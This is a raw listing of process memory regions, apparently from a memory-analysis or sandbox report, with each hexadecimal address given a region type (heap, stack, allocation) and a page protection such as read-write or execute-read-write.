page execute and read and write
28C88B6F000
heap
page read and write
1E1A066C000
heap
page read and write
14B35AA9000
heap
page read and write
28C8776C000
heap
page read and write
1436D9F8000
heap
page read and write
28C88B34000
heap
page read and write
28C87354000
heap
page read and write
1CCD86D1000
heap
page read and write
28C88F80000
trusted library allocation
page read and write
28C87C90000
heap
page read and write
28C88B34000
heap
page read and write
28C87C74000
heap
page read and write
18EBB080000
heap
page read and write
1619A170000
heap
page read and write
1D608350000
heap
page read and write
4D5FF5F000
stack
page read and write
1CCD86C4000
heap
page read and write
1CCD86C4000
heap
page read and write
14B35A88000
heap
page read and write
28C87DCA000
heap
page read and write
1436DBB0000
trusted library allocation
page read and write
28C87DBE000
heap
page read and write
F134D4000
stack
page read and write
18D01800000
heap
page read and write
18EBB6A2000
heap
page read and write
15371740000
heap
page read and write
1F23DC90000
direct allocation
page read and write
14B35A7E000
heap
page read and write
28C87CA8000
heap
page read and write
7FF8B8B42000
unkown
page read and write
28C87E29000
heap
page read and write
28E2D4A9000
heap
page read and write
1AC9F6AD000
heap
page read and write
1E19FFF2000
heap
page read and write
1BF4F6F1000
heap
page read and write
1AC9F6AD000
heap
page read and write
D6C9FFF000
stack
page read and write
1CCD86C4000
heap
page read and write
18EBB818000
heap
page read and write
28C87C73000
heap
page read and write
7FF8BA241000
unkown
page execute read
241A8740000
heap
page read and write
14B35533000
heap
page read and write
1F23DD39000
direct allocation
page read and write
20C0AD70000
heap
page read and write
257A314F000
heap
page read and write
1619A2F0000
heap
page execute and read and write
1CCD86A0000
heap
page read and write
173412A0000
heap
page read and write
28C88700000
direct allocation
page read and write
7FF8A8247000
unkown
page execute and read and write
8242FB000
stack
page read and write
28C88A33000
heap
page read and write
28C88A37000
heap
page read and write
15372FA3000
trusted library allocation
page read and write
28C876B1000
heap
page read and write
E8CB87F000
stack
page read and write
17342268000
heap
page read and write
1CCD86D1000
heap
page read and write
28C88610000
direct allocation
page read and write
2545B398000
heap
page read and write
1E1A2020000
heap
page read and write
7FF8A851B000
unkown
page execute and read and write
1CCD86D0000
heap
page read and write
1619A421000
heap
page read and write
14B37334000
heap
page read and write
28E2CE44000
heap
page read and write
28C886E0000
direct allocation
page read and write
173421E4000
heap
page read and write
1E1A0679000
heap
page read and write
16191F88000
trusted library allocation
page read and write
18A64C21000
heap
page read and write
1A6A1454000
heap
page read and write
262432A0000
heap
page read and write
7FF847930000
trusted library allocation
page read and write
6AB070B000
stack
page read and write
1E19FFA0000
heap
page read and write
1E1A004E000
heap
page read and write
1733EF18000
heap
page read and write
28C8769D000
heap
page read and write
18A64FB5000
heap
page read and write
22AE13CA000
heap
page read and write
28C88B34000
heap
page read and write
1BF4F6F1000
heap
page read and write
7FF73AE4E000
unkown
page read and write
1619A3FD000
heap
page read and write
28C87C5D000
heap
page read and write
7FF847A83000
trusted library allocation
page read and write
B4AF8FE000
stack
page read and write
23315750000
heap
page read and write
1CCD86D1000
heap
page read and write
15372EF0000
trusted library allocation
page read and write
199D3D25000
heap
page read and write
7FF8B9841000
unkown
page execute and read and write
1436DBF7000
heap
page read and write
7FF8B8CC2000
unkown
page execute and write copy
1436DC7D000
heap
page read and write
28E2CEA4000
heap
page read and write
1429B990000
heap
page read and write
98A0AFF000
unkown
page read and write
14B35533000
heap
page read and write
28C88738000
heap
page read and write
15371619000
heap
page read and write
1436DC75000
heap
page read and write
28C88F89000
heap
page read and write
15371745000
heap
page read and write
28C87DA6000
heap
page read and write
1BC8A89E000
heap
page read and write
1F23A920000
heap
page read and write
D0F79F5000
stack
page read and write
B4AF9FE000
stack
page read and write
8244FE000
stack
page read and write
7DF46D2D0000
trusted library allocation
page execute and read and write
1429BA49000
heap
page read and write
E8CBA7F000
stack
page read and write
14B35AAA000
heap
page read and write
B4AF558000
stack
page read and write
28C87D68000
heap
page read and write
28C87D68000
heap
page read and write
28C87CE1000
heap
page read and write
1436DC00000
heap
page read and write
7FF8A8142000
unkown
page execute and read and write
28C87CA8000
heap
page read and write
257A3138000
heap
page read and write
2624305A000
heap
page read and write
28C87DCA000
heap
page read and write
28E2CD30000
heap
page read and write
1429B970000
heap
page read and write
14B35A72000
heap
page read and write
199D3D20000
heap
page read and write
18D018C1000
heap
page read and write
28C88DA0000
heap
page read and write
28C87C9B000
heap
page read and write
28C88680000
direct allocation
page read and write
28E2D499000
heap
page read and write
28810FF000
stack
page read and write
173422D1000
heap
page read and write
1CCD86C4000
heap
page read and write
1CCD86C4000
heap
page read and write
7FF8B7E01000
unkown
page execute read
28C88B61000
heap
page read and write
28C88F10000
direct allocation
page read and write
1436D9ED000
heap
page read and write
28C871D0000
direct allocation
page read and write
28E2D4A7000
heap
page read and write
B0631FF000
stack
page read and write
28C88B3F000
heap
page read and write
28C87CD4000
heap
page read and write
28C87C68000
heap
page read and write
7FF73AE3B000
unkown
page readonly
25CAEB61000
heap
page read and write
20C0AD60000
heap
page read and write
21D4D841000
heap
page read and write
7FF8B8CF1000
unkown
page execute and write copy
1E1A0044000
heap
page read and write
28C88791000
heap
page read and write
28C88650000
direct allocation
page read and write
173422B8000
heap
page read and write
1E1A004B000
heap
page read and write
28E2CFB7000
heap
page read and write
257A3126000
heap
page read and write
1E1A0653000
heap
page read and write
28C88630000
direct allocation
page read and write
15372F17000
heap
page execute and read and write
28C876F5000
heap
page read and write
18D018B8000
heap
page read and write
1436D9FD000
heap
page read and write
18EBB818000
heap
page read and write
7FF8A8552000
unkown
page execute and read and write
26CD27E1000
heap
page read and write
7FF8477B0000
trusted library allocation
page execute and read and write
C0A65CE000
stack
page read and write
28CC32B0000
heap
page read and write
20C0AC30000
heap
page read and write
28816BC000
stack
page read and write
16191C81000
trusted library allocation
page read and write
28C87CA8000
heap
page read and write
28C88852000
heap
page read and write
15371590000
heap
page read and write
28C8876B000
heap
page read and write
1CCD86D1000
heap
page read and write
22AE13C2000
heap
page read and write
1619A19A000
heap
page read and write
28C88757000
heap
page read and write
17341164000
heap
page read and write
28C87C88000
heap
page read and write
25CAEB4A000
heap
page read and write
1CCD86D1000
heap
page read and write
262432B0000
heap
page read and write
1A96E3C0000
heap
page read and write
1BF4F680000
heap
page read and write
1BC8A8BC000
heap
page read and write
20D5DEC4000
heap
page read and write
1BF4F6F1000
heap
page read and write
28CC33B0000
heap
page read and write
28C88749000
heap
page read and write
28E2D477000
heap
page read and write
28C87701000
heap
page read and write
28FE122A000
heap
page read and write
28E2CE45000
heap
page read and write
28C87682000
heap
page read and write
7FF8A819F000
unkown
page execute and read and write
28C87C73000
heap
page read and write
28C881F4000
direct allocation
page read and write
28E2CFEB000
heap
page read and write
28C87C1F000
heap
page read and write
28C8769A000
heap
page read and write
16181C81000
trusted library allocation
page read and write
14B35440000
trusted library allocation
page read and write
1530176B000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
7FF73AE11000
unkown
page execute read
18EBB0EE000
heap
page read and write
28C87D80000
heap
page read and write
18EBD0B4000
heap
page read and write
161801B7000
heap
page read and write
48A34FF000
unkown
page read and write
7FF8B8F70000
unkown
page readonly
28FE13F0000
heap
page read and write
7FF8A9353000
unkown
page execute and read and write
18EBB0A7000
heap
page read and write
7FF847830000
trusted library allocation
page read and write
14B35AB2000
heap
page read and write
28C8822C000
direct allocation
page read and write
4B4C13F000
stack
page read and write
7FF8479B0000
trusted library allocation
page read and write
1436DBFA000
heap
page read and write
17341166000
heap
page read and write
28C87DAA000
heap
page read and write
2109CFF000
stack
page read and write
1F23A7E0000
heap
page read and write
234DABAA000
heap
page read and write
1BC8A8CA000
heap
page read and write
28E2ED10000
heap
page read and write
1E1A0058000
heap
page read and write
14B35A94000
heap
page read and write
28E2CE47000
heap
page read and write
28E2CE76000
heap
page read and write
28E2CD50000
heap
page read and write
16183594000
trusted library allocation
page read and write
B6EEAFF000
stack
page read and write
173409F0000
heap
page read and write
15371665000
heap
page read and write
28C87CA8000
heap
page read and write
26CD2770000
heap
page read and write
28C87DAA000
heap
page read and write
28C87830000
direct allocation
page read and write
15373070000
heap
page read and write
28E2CDF7000
heap
page read and write
1F23DB90000
direct allocation
page read and write
1CCD86C4000
heap
page read and write
28C87C90000
heap
page read and write
7FF8B8B30000
unkown
page execute and read and write
15373593000
heap
page read and write
17342208000
heap
page read and write
28C87302000
heap
page read and write
1CCD86C4000
heap
page read and write
28C87C23000
heap
page read and write
28C87DE6000
heap
page read and write
28C87D04000
heap
page read and write
288173E000
stack
page read and write
28C88DE6000
heap
page read and write
28C88916000
heap
page read and write
7FF84774C000
trusted library allocation
page execute and read and write
1733EFC9000
heap
page read and write
15372F60000
heap
page read and write
28CC32E2000
heap
page read and write
1E19FFC3000
heap
page read and write
234DABC0000
heap
page read and write
28C88A6C000
heap
page read and write
153734D0000
heap
page read and write
28C87CA0000
heap
page read and write
7FF847880000
trusted library allocation
page execute and read and write
1CCD86D0000
heap
page read and write
28C87C76000
heap
page read and write
28C88806000
heap
page read and write
28C87CB0000
heap
page read and write
BF7F3DC000
stack
page read and write
5CB18FB000
stack
page read and write
173422B8000
heap
page read and write
28C88CDF000
heap
page read and write
1BC8A8B7000
heap
page read and write
28E2CFBA000
heap
page read and write
246E4FC7000
heap
page read and write
28C876DA000
heap
page read and write
17342283000
heap
page read and write
18EBB0F4000
heap
page read and write
28C877E1000
heap
page read and write
28C88284000
direct allocation
page read and write
17341A9D000
heap
page read and write
28E2CE20000
heap
page read and write
28C87800000
heap
page read and write
28C87CA2000
heap
page read and write
7FF8478D0000
trusted library allocation
page read and write
28C87C57000
heap
page read and write
1436DA32000
heap
page read and write
1CCD86C3000
heap
page read and write
28C87185000
heap
page read and write
1F23C170000
direct allocation
page read and write
2109BFF000
unkown
page read and write
1E1A1EED000
heap
page read and write
28C87C73000
heap
page read and write
1F23A76C000
heap
page read and write
1CCD86C4000
heap
page read and write
28C87C2E000
heap
page read and write
28C88A40000
heap
page read and write
14B35512000
heap
page read and write
18EBB30B000
heap
page read and write
18D018C1000
heap
page read and write
28C88862000
heap
page read and write
28C858A0000
heap
page readonly
28C87D6D000
heap
page read and write
28E2ED12000
heap
page read and write
1F23A6A0000
heap
page read and write
1BC8A9B5000
heap
page read and write
1F23A766000
heap
page read and write
1436FAC0000
heap
page read and write
9CB02FF000
stack
page read and write
14B353F0000
heap
page read and write
257A33C0000
heap
page read and write
28C877E4000
heap
page read and write
28C87CA0000
heap
page read and write
1F23DD30000
direct allocation
page read and write
23315540000
heap
page read and write
1733EEC0000
heap
page read and write
28C87D68000
heap
page read and write
1F23DD39000
direct allocation
page read and write
7FF8A8F2A000
unkown
page read and write
1E1A0674000
heap
page read and write
28C88738000
heap
page read and write
28C88B85000
heap
page read and write
18A64C00000
heap
page read and write
1F23A770000
heap
page read and write
26CD27E1000
heap
page read and write
28C87C6B000
heap
page read and write
28C87D8A000
heap
page read and write
4D5CC7F000
stack
page read and write
28C87C68000
heap
page read and write
16191F78000
trusted library allocation
page read and write
1436D9ED000
heap
page read and write
1BF4F7D0000
heap
page read and write
28E2D4A2000
heap
page read and write
1AC9F6BA000
heap
page read and write
28C88B6D000
heap
page read and write
7FF8A81A4000
unkown
page execute and read and write
1AC9F5E0000
heap
page read and write
1D6082E0000
heap
page read and write
18EBB80F000
heap
page read and write
7FF8478D0000
trusted library allocation
page read and write
28C88986000
heap
page read and write
28E2D499000
heap
page read and write
28C8800C000
direct allocation
page read and write
28C87D3E000
heap
page read and write
7FF8A9355000
unkown
page execute and read and write
7FF847AE0000
trusted library allocation
page read and write
7FF8A92D1000
unkown
page execute and read and write
28E2CEB3000
heap
page read and write
15300235000
trusted library allocation
page read and write
1AC9F6AD000
heap
page read and write
16182E20000
trusted library allocation
page read and write
1CCD86C4000
heap
page read and write
1429BCD5000
heap
page read and write
1436DBF0000
heap
page read and write
C3ED74B000
stack
page read and write
1A96E2C0000
heap
page read and write
1E1A0669000
heap
page read and write
7FF847851000
trusted library allocation
page read and write
1436DBF2000
heap
page read and write
1E19FF70000
trusted library allocation
page read and write
173422B8000
heap
page read and write
1E1A1EE1000
heap
page read and write
1CCDA030000
heap
page read and write
28C87B5F000
heap
page read and write
1733F0B0000
heap
page read and write
28C88806000
heap
page read and write
14B37321000
heap
page read and write
28C877A5000
heap
page read and write
14B35A90000
heap
page read and write
28C88A19000
heap
page read and write
28E2CE22000
heap
page read and write
4B4C43E000
stack
page read and write
16180310000
heap
page execute and read and write
1CCD86D1000
heap
page read and write
28C87D11000
heap
page read and write
F00A98C000
stack
page read and write
28C88B5F000
heap
page read and write
22AE13BF000
heap
page read and write
20C0AC00000
heap
page read and write
173422DC000
heap
page read and write
1429B890000
heap
page read and write
1B839BF0000
heap
page read and write
14B35A97000
heap
page read and write
1F23A7A0000
heap
page read and write
12F9FEF000
stack
page read and write
28E2CE65000
heap
page read and write
1F23A867000
direct allocation
page read and write
7FF8B9094000
unkown
page read and write
22AE13C5000
heap
page read and write
1F23DCB1000
direct allocation
page read and write
28C88792000
heap
page read and write
28C87B52000
heap
page read and write
26243030000
heap
page read and write
18EBB110000
heap
page read and write
15373577000
heap
page read and write
257A3100000
heap
page read and write
28E2D47C000
heap
page read and write
1CCD86D2000
heap
page read and write
1F23DB50000
direct allocation
page read and write
2545B300000
heap
page read and write
28C88B61000
heap
page read and write
1F23A75F000
heap
page read and write
28C88B51000
heap
page read and write
1D608310000
heap
page read and write
DFF4EFE000
stack
page read and write
15300C35000
trusted library allocation
page read and write
97AEFD000
stack
page read and write
28C88640000
direct allocation
page read and write
173410DC000
heap
page read and write
28C88F60000
direct allocation
page read and write
15301914000
trusted library allocation
page read and write
26CD2AB5000
heap
page read and write
23315560000
heap
page read and write
28C88B3F000
heap
page read and write
28E2CEC2000
heap
page read and write
1436DA25000
heap
page read and write
14B3553E000
heap
page read and write
1BC8A878000
heap
page read and write
22AE139B000
heap
page read and write
193223A0000
heap
page read and write
161801CD000
heap
page read and write
28C87B63000
heap
page read and write
21AD4620000
heap
page read and write
182DF990000
heap
page read and write
28C87180000
heap
page read and write
1E1A003C000
heap
page read and write
28C87CC8000
heap
page read and write
32E16FF000
unkown
page read and write
1EE628BA000
heap
page read and write
21AD4639000
heap
page read and write
14B35410000
trusted library allocation
page read and write
7FF8A81B1000
unkown
page execute and read and write
1436DBFB000
heap
page read and write
1C7FBA61000
heap
page read and write
7FF8A9388000
unkown
page execute and read and write
5CB1AFF000
stack
page read and write
14B3543A000
heap
page read and write
28C8828C000
direct allocation
page read and write
97B07F000
stack
page read and write
28C87800000
heap
page read and write
28C87352000
heap
page read and write
28C88140000
direct allocation
page read and write
28C87D78000
heap
page read and write
17341166000
heap
page read and write
234DADB0000
heap
page read and write
28C87C90000
heap
page read and write
14B3732E000
heap
page read and write
1D608349000
heap
page read and write
28C88852000
heap
page read and write
1436DC7E000
heap
page read and write
28C88620000
direct allocation
page read and write
1EE13960000
heap
page read and write
7FF7F7F09000
unkown
page write copy
28C87C77000
heap
page read and write
97AF7F000
stack
page read and write
B4AF5DF000
stack
page read and write
26CD27C0000
heap
page read and write
7FF8479C0000
trusted library allocation
page read and write
C0A9A1F000
stack
page read and write
4D5CBFE000
stack
page read and write
15301BF2000
trusted library allocation
page read and write
28C87D33000
heap
page read and write
28C88A33000
heap
page read and write
28E2CE45000
heap
page read and write
28C87CA8000
heap
page read and write
28C88650000
direct allocation
page read and write
28C886F0000
direct allocation
page read and write
15373522000
heap
page read and write
257A3136000
heap
page read and write
1436D998000
heap
page read and write
7FF8477C0000
trusted library allocation
page execute and read and write
15373750000
heap
page execute and read and write
1E1A1EEE000
heap
page read and write
1E1A0020000
heap
page read and write
7FF7F7E80000
unkown
page readonly
1E1A01BB000
heap
page read and write
7FF847760000
trusted library allocation
page execute and read and write
28C87358000
heap
page read and write
1C7FB8C0000
heap
page read and write
1CCD86C4000
heap
page read and write
28E2D49F000
heap
page read and write
22AE1395000
heap
page read and write
1F23A78A000
heap
page read and write
28C87B75000
heap
page read and write
D0F7DFF000
stack
page read and write
6764FF000
unkown
page read and write
28C89460000
heap
page read and write
18EBB6A0000
heap
page read and write
18EBB0E6000
heap
page read and write
28C88B51000
heap
page read and write
1E19FFF7000
heap
page read and write
21D4D82A000
heap
page read and write
27258B08000
heap
page read and write
1F23A76C000
heap
page read and write
1436DA25000
heap
page read and write
14B35435000
heap
page read and write
28C87C90000
heap
page read and write
18D017E0000
heap
page read and write
28C882A4000
direct allocation
page read and write
2545B380000
heap
page read and write
1CCD86D1000
heap
page read and write
2BAD9900000
heap
page read and write
1CCD86C4000
heap
page read and write
28C88916000
heap
page read and write
7FF8BA240000
unkown
page readonly
32E17FF000
stack
page read and write
28E2CE46000
heap
page read and write
28C88B6F000
heap
page read and write
1A96E560000
heap
page read and write
28C87C67000
heap
page read and write
7FF8B93D7000
unkown
page execute and write copy
1436E129000
heap
page read and write
18EBB0FD000
heap
page read and write
B2C22FC000
stack
page read and write
28E2CEB3000
heap
page read and write
28C87B62000
heap
page read and write
2720DDE5000
heap
page read and write
16180300000
trusted library allocation
page read and write
28E2CFE0000
heap
page read and write
28C882A8000
direct allocation
page read and write
7FF84785A000
trusted library allocation
page read and write
18A64C0B000
heap
page read and write
28C87C49000
heap
page read and write
18EBB0D2000
heap
page read and write
15373670000
heap
page read and write
28E2D4A5000
heap
page read and write
28C88680000
direct allocation
page read and write
28C88A1B000
heap
page read and write
1F23A7E0000
heap
page read and write
28C877D6000
heap
page read and write
20D5DEAE000
heap
page read and write
1E1A0057000
heap
page read and write
7FF8A81D2000
unkown
page execute and read and write
28C877BA000
heap
page read and write
18EBB0CA000
heap
page read and write
4D5FEDC000
stack
page read and write
161801F7000
heap
page read and write
28C87D79000
heap
page read and write
1E1A005F000
heap
page read and write
28C88B64000
heap
page read and write
161829E9000
trusted library allocation
page read and write
28C87800000
heap
page read and write
7FF8479E9000
trusted library allocation
page read and write
1D6082F0000
heap
page read and write
1CCD8660000
heap
page readonly
28E2CEAA000
heap
page read and write
1BD202D0000
heap
page read and write
7FF847845000
trusted library allocation
page read and write
1C7FBA4A000
heap
page read and write
28C87CB8000
heap
page read and write
1436D9E3000
heap
page read and write
14B35510000
heap
page read and write
28C88794000
heap
page read and write
28E2CE31000
heap
page read and write
7FF8A81B0000
unkown
page readonly
28C87351000
heap
page read and write
28C876A9000
heap
page read and write
28C87D36000
heap
page read and write
1436F9BD000
heap
page read and write
28E2CDF7000
heap
page read and write
1429BA50000
heap
page read and write
28C88A1B000
heap
page read and write
7FF8476B4000
trusted library allocation
page read and write
1CCD86C8000
heap
page read and write
28C876B9000
heap
page read and write
28C88B34000
heap
page read and write
28C898F0000
direct allocation
page read and write
21AD4530000
heap
page read and write
28C87E4B000
heap
page read and write
1733EF18000
heap
page read and write
28C87333000
heap
page read and write
7FF73AE3B000
unkown
page readonly
28E2CE31000
heap
page read and write
1436DBFE000
heap
page read and write
28C88A1B000
heap
page read and write
7FF8A8091000
unkown
page execute and read and write
9CB00FC000
stack
page read and write
28C87DA4000
heap
page read and write
14B3553E000
heap
page read and write
28C87CA0000
heap
page read and write
1CCD86C4000
heap
page read and write
1E19FFCE000
heap
page read and write
28C87C6B000
heap
page read and write
18EBB829000
heap
page read and write
28C88A4B000
heap
page read and write
28C87D78000
heap
page read and write
7FF8476A4000
trusted library allocation
page read and write
28E2CE6E000
heap
page read and write
18EBB260000
heap
page read and write
7FF8B8CEF000
unkown
page execute and read and write
1EE628A0000
heap
page read and write
14B35A7B000
heap
page read and write
257A3060000
heap
page read and write
7FF8A8090000
unkown
page readonly
89020FB000
stack
page read and write
7FF8B9090000
unkown
page execute and read and write
161801FA000
heap
page read and write
1619A3B0000
heap
page read and write
28C88B6F000
heap
page read and write
28C88A6C000
heap
page read and write
18EBB821000
heap
page read and write
1EE13691000
heap
page read and write
28C88B3F000
heap
page read and write
28E2CE6E000
heap
page read and write
1429BCD0000
heap
page read and write
18EBD0A0000
heap
page read and write
7FF8A81D8000
unkown
page execute and read and write
1436D9A7000
heap
page read and write
28E2CFE5000
heap
page read and write
18EBB6A3000
heap
page read and write
28C87630000
heap
page read and write
241A857B000
heap
page read and write
1BC8A893000
heap
page read and write
1F23A7E0000
heap
page read and write
7FF847776000
trusted library allocation
page execute and read and write
7FF8B906C000
unkown
page read and write
28C87C70000
heap
page read and write
28C88A31000
heap
page read and write
28C8734B000
heap
page read and write
7FF8476AB000
trusted library allocation
page read and write
18EBB80F000
heap
page read and write
28C88B49000
heap
page read and write
C0A63DD000
stack
page read and write
1BC8A8A1000
heap
page read and write
D5385FF000
unkown
page read and write
1E1A003D000
heap
page read and write
28C88B7F000
heap
page read and write
1EE628C0000
heap
page read and write
28C87A31000
heap
page read and write
28C8767C000
heap
page read and write
28C87CA0000
heap
page read and write
7FF8A8147000
unkown
page execute and read and write
18D01810000
heap
page read and write
1AC9F6B5000
heap
page read and write
28817BB000
stack
page read and write
1D60833A000
heap
page read and write
1F23DB70000
direct allocation
page read and write
28C88FA0000
direct allocation
page read and write
1F23A76A000
heap
page read and write
193223A0000
heap
page read and write
28C87C73000
heap
page read and write
28C87C67000
heap
page read and write
1BC8A8A1000
heap
page read and write
E8CB97E000
stack
page read and write
14B35AB2000
heap
page read and write
7FF73AE52000
unkown
page readonly
28C8773A000
heap
page read and write
7FF8A85EA000
unkown
page execute and read and write
1F23DC50000
direct allocation
page read and write
1734117B000
heap
page read and write
28C88A17000
heap
page read and write
1BC8A8AB000
heap
page read and write
1E1A01BE000
heap
page read and write
1537356F000
heap
page read and write
597FA7C000
stack
page read and write
1BF4F6F1000
heap
page read and write
7FF8A8B1F000
unkown
page execute and read and write
17340880000
heap
page read and write
28C8878F000
heap
page read and write
28C886D0000
direct allocation
page read and write
7FF847B10000
trusted library allocation
page read and write
28C87B6F000
heap
page read and write
1436DBB0000
trusted library allocation
page read and write
153016A3000
trusted library allocation
page read and write
20C0AD30000
heap
page read and write
1CCD86D1000
heap
page read and write
28C88270000
direct allocation
page read and write
67687CC000
stack
page read and write
18EBB2A0000
trusted library allocation
page read and write
1AC9F850000
heap
page read and write
4B4BF7F000
stack
page read and write
1429BA48000
heap
page read and write
6761FC000
stack
page read and write
28FE11D0000
heap
page read and write
1AC9F6BA000
heap
page read and write
18EBB821000
heap
page read and write
7FF8478B0000
trusted library allocation
page read and write
1436DBFE000
heap
page read and write
7FF847756000
trusted library allocation
page read and write
28C87C76000
heap
page read and write
14B3732E000
heap
page read and write
7FF8A92D0000
unkown
page readonly
7FF8BA258000
unkown
page read and write
94112FF000
stack
page read and write
1E1A1EEE000
heap
page read and write
27258B11000
heap
page read and write
ED9D4FF000
unkown
page read and write
28B63338000
heap
page read and write
1CCD86C4000
heap
page read and write
28E2ED14000
heap
page read and write
1436D9D5000
heap
page read and write
7DF46D2E0000
trusted library allocation
page execute and read and write
28C87789000
heap
page read and write
257A315A000
heap
page read and write
16180325000
heap
page read and write
257A314C000
heap
page read and write
28C87CB0000
heap
page read and write
28C87DA0000
heap
page read and write
28C87800000
heap
page read and write
7FF7F7F08000
unkown
page read and write
257A3125000
heap
page read and write
28E2CEC6000
heap
page read and write
17341166000
heap
page read and write
18EBB7F8000
heap
page read and write
28C88794000
heap
page read and write
4B4C33E000
stack
page read and write
153715A6000
heap
page read and write
7FF73AE11000
unkown
page execute read
21AD47A0000
heap
page read and write
1E1A0058000
heap
page read and write
28C876A3000
heap
page read and write
25CAEA20000
heap
page read and write
18EBB305000
heap
page read and write
28C88CDB000
heap
page read and write
7FF847882000
trusted library allocation
page read and write
20C0AC74000
heap
page read and write
1F23DCB1000
direct allocation
page read and write
18EBB0F4000
heap
page read and write
7FF8A86E1000
unkown
page execute and read and write
1BC8A8A2000
heap
page read and write
28C87789000
heap
page read and write
1CCD86C4000
heap
page read and write
7FF847750000
trusted library allocation
page read and write
1F23A7B8000
heap
page read and write
7DF46D2C0000
trusted library allocation
page execute and read and write
28C87D23000
heap
page read and write
AC26BFF000
unkown
page read and write
21AD4637000
heap
page read and write
19322360000
heap
page read and write
22AE13CA000
heap
page read and write
408188000
stack
page read and write
28C8768B000
heap
page read and write
1F23DC30000
direct allocation
page read and write
28C88F30000
direct allocation
page read and write
7FF847900000
trusted library allocation
page read and write
28C877D4000
heap
page read and write
173422D0000
heap
page read and write
28C88806000
heap
page read and write
1F23A741000
heap
page read and write
1436DA0B000
heap
page read and write
17341167000
heap
page read and write
28E2ED1E000
heap
page read and write
1F23A720000
heap
page read and write
21AD4641000
heap
page read and write
28C87322000
heap
page read and write
18EBB0CC000
heap
page read and write
16183198000
trusted library allocation
page read and write
1F23A7C1000
heap
page read and write
1AC9F6BA000
heap
page read and write
18EBB0F4000
heap
page read and write
27258B11000
heap
page read and write
1436DBF3000
heap
page read and write
28C87CD4000
heap
page read and write
4B4BE7E000
stack
page read and write
14B354C0000
heap
page read and write
28E2CD70000
trusted library allocation
page read and write
28C877D9000
heap
page read and write
7FF847AD0000
trusted library allocation
page read and write
15373693000
heap
page read and write
18EBB0D8000
heap
page read and write
28C87D9B000
heap
page read and write
4B4CF0D000
stack
page read and write
1429BB30000
heap
page read and write
28E2ED13000
heap
page read and write
16180170000
heap
page read and write
17342260000
heap
page read and write
1F23A7B0000
heap
page read and write
153737BA000
heap
page read and write
1436E132000
heap
page read and write
28C88680000
direct allocation
page read and write
2109AFC000
stack
page read and write
94113FE000
stack
page read and write
18A64DF0000
heap
page read and write
1436E10F000
heap
page read and write
28C8766F000
heap
page read and write
7FF73AE52000
unkown
page readonly
234DABC0000
heap
page read and write
1CCD86C4000
heap
page read and write
1436D9E3000
heap
page read and write
28C87D9A000
heap
page read and write
18EBB81D000
heap
page read and write
1E1A1EE4000
heap
page read and write
14B35524000
heap
page read and write
7FF8B8CC1000
unkown
page execute and read and write
1436DBF4000
heap
page read and write
28C88B34000
heap
page read and write
1EE626F0000
heap
page read and write
173422E4000
heap
page read and write
1E1A064C000
heap
page read and write
1F23A7C8000
heap
page read and write
E8CB598000
stack
page read and write
28C88B73000
heap
page read and write
28C87704000
heap
page read and write
28C87C68000
heap
page read and write
28FE1241000
heap
page read and write
1BD201DB000
heap
page read and write
28C88B5F000
heap
page read and write
28C87CA8000
heap
page read and write
28E2CE31000
heap
page read and write
48A31BC000
stack
page read and write
22AE13A7000
heap
page read and write
193225B0000
heap
page read and write
28C87CA2000
heap
page read and write
14B35A7A000
heap
page read and write
234DAB80000
heap
page read and write
20D5DE60000
heap
page read and write
28C88AF5000
heap
page read and write
B6EE9FF000
unkown
page read and write
28C87690000
heap
page read and write
1734229A000
heap
page read and write
4B4C23A000
stack
page read and write
7FF73AE10000
unkown
page readonly
1E1A0020000
heap
page read and write
173422B8000
heap
page read and write
17342258000
heap
page read and write
1530196F000
trusted library allocation
page read and write
22AE1350000
heap
page read and write
18EBB818000
heap
page read and write
1E1A005A000
heap
page read and write
1E1A0046000
heap
page read and write
7FF8A8EE6000
unkown
page execute and read and write
1F23A7D7000
heap
page read and write
7FF847960000
trusted library allocation
page read and write
20D5DE7B000
heap
page read and write
2720DB29000
heap
page read and write
28C87365000
heap
page read and write
6AB0BFF000
stack
page read and write
1BC8A899000
heap
page read and write
28C8735E000
heap
page read and write
28E2D485000
heap
page read and write
2720D990000
heap
page read and write
28C876F1000
heap
page read and write
1EE628C0000
heap
page read and write
28C88700000
direct allocation
page read and write
16182DFF000
trusted library allocation
page read and write
21D4D800000
heap
page read and write
1733EFBA000
heap
page read and write
14B35A8F000
heap
page read and write
246E4FC0000
heap
page read and write
28C87C76000
heap
page read and write
28CC32C7000
heap
page read and write
7FF8A865A000
unkown
page execute and read and write
15301604000
trusted library allocation
page read and write
28C87D6D000
heap
page read and write
28E2D4A2000
heap
page read and write
1CCD8670000
heap
page read and write
246E4FCB000
heap
page read and write
17342270000
heap
page read and write
7FF8479C3000
trusted library allocation
page read and write
1F23DBF0000
direct allocation
page read and write
1BD201F1000
heap
page read and write
14B35538000
heap
page read and write
1E1A0679000
heap
page read and write
1E1A003F000
heap
page read and write
1F23A8E0000
direct allocation
page read and write
28C87358000
heap
page read and write
7FF8B9F75000
unkown
page execute and read and write
D6C9EFF000
unkown
page read and write
7FF8A86A7000
unkown
page execute and write copy
28C87C70000
heap
page read and write
1436F9B6000
heap
page read and write
1F23DD3D000
direct allocation
page read and write
7FF8B93D3000
unkown
page execute and read and write
28C887AD000
heap
page read and write
28C87C76000
heap
page read and write
28C87AD4000
heap
page read and write
17341164000
heap
page read and write
28C87D7E000
heap
page read and write
7FF847860000
trusted library allocation
page execute and read and write
1AC9F68B000
heap
page read and write
7FF8B8CD0000
unkown
page readonly
1619A4F4000
heap
page read and write
28C87D18000
heap
page read and write
18EBD250000
heap
page read and write
7FF8479A0000
trusted library allocation
page read and write
241A8550000
heap
page read and write
28C877D4000
heap
page read and write
7FF8A8B98000
unkown
page execute and read and write
28C88620000
direct allocation
page read and write
20D5FC70000
heap
page read and write
E4DF72C000
stack
page read and write
68D9FFF000
stack
page read and write
28C87C10000
heap
page read and write
4B4BEFC000
stack
page read and write
28C88B49000
heap
page read and write
1C7FBA61000
heap
page read and write
1E19FFCA000
heap
page read and write
1CCD86D1000
heap
page read and write
14B35521000
heap
page read and write
1436DA29000
heap
page read and write
28E2CE31000
heap
page read and write
28C88F10000
direct allocation
page read and write
1F23A87B000
direct allocation
page read and write
28C87C68000
heap
page read and write
1734229A000
heap
page read and write
7FF847A20000
trusted library allocation
page read and write
28C87358000
heap
page read and write
28C88A33000
heap
page read and write
28C88610000
direct allocation
page read and write
7FF847B00000
trusted library allocation
page read and write
1436DA2B000
heap
page read and write
14B35A77000
heap
page read and write
28C87800000
heap
page read and write
14B35530000
heap
page read and write
1F23A7E7000
heap
page read and write
1436E139000
heap
page read and write
1F23A769000
heap
page read and write
28C85906000
heap
page read and write
182DF900000
heap
page read and write
